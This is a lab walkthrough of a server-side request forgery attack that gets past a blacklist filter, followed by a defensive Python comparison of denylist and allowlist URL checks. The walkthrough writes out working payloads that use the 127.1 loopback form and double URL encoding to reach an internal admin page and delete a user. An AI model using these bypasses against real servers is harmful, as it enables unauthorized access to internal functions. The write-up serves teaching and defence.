SSRF with blacklist-based input filter

Let's check out the stock.

We can intercept the request using Burp Suite.

Let's send the request to the Repeater.

We can set the stockApi field to the following and send the request:

http://localhost/admin

So that request is blocked.

Let's send the following request:

http://127.1/

Ah! That returns a valid response.

Let's try visiting the /admin page.

http://127.1/admin

Looks like the admin keyword in the path is being pattern-matched and blocked.

We can get around it by double URL encoding that path segment, so the filter sees only percent-encoded bytes while the back end decodes it a second time.

Let's now send the following request:

http://127.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65

We can now delete the carlos user.

http://127.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65/delete?username=carlos

We have solved the lab.
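As an added example (not part of this walkthrough or the lab's code), the following Python contrasts a denylist check with the same weaknesses the lab exhibits against an allowlist check that canonicalizes the path before comparing it; the allowed host, path and port policy are assumptions.

```python
from urllib.parse import urlsplit, unquote

# Denylist check modelled on the behaviour the lab exhibits (constructed for
# illustration, not the lab's real code): it rejects a few literal hostnames
# and any path that contains the word "admin".
BLOCKED_HOSTS = {"localhost", "127.0.0.1"}
BLOCKED_PATH_WORDS = ("admin",)

def denylist_allows(url: str) -> bool:
    parts = urlsplit(url)
    if (parts.hostname or "") in BLOCKED_HOSTS:
        return False
    return not any(word in parts.path.lower() for word in BLOCKED_PATH_WORDS)

# Allowlist check: the one destination the stock feature legitimately needs.
# Host and path below are assumptions, not values taken from the lab.
ALLOWED_HOSTS = {"stock.example.internal"}
ALLOWED_PATH = "/product/stock"
MAX_DECODE_ROUNDS = 3  # bound the loop; deeper nesting is rejected outright

def canonical_path(path: str):
    """Percent-decode until the path stops changing, so the value compared is
    the one the back end will finally see. Returns None if the path is still
    changing after MAX_DECODE_ROUNDS."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            return path
        path = decoded
    return None

def allowlist_allows(url: str) -> bool:
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.hostname not in ALLOWED_HOSTS:   # "127.1" fails here: it is not on the list
        return False
    if parts.port not in (None, 80, 443):      # assumption: only default ports are needed
        return False
    # Exact match on the canonical path, not a substring search for bad words.
    return canonical_path(parts.path) == ALLOWED_PATH
```

Run against the two URLs from the walkthrough, denylist_allows returns True for both while allowlist_allows returns False; the difference is that the allowlist compares the canonicalized value against one known-good destination instead of searching for bad substrings.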
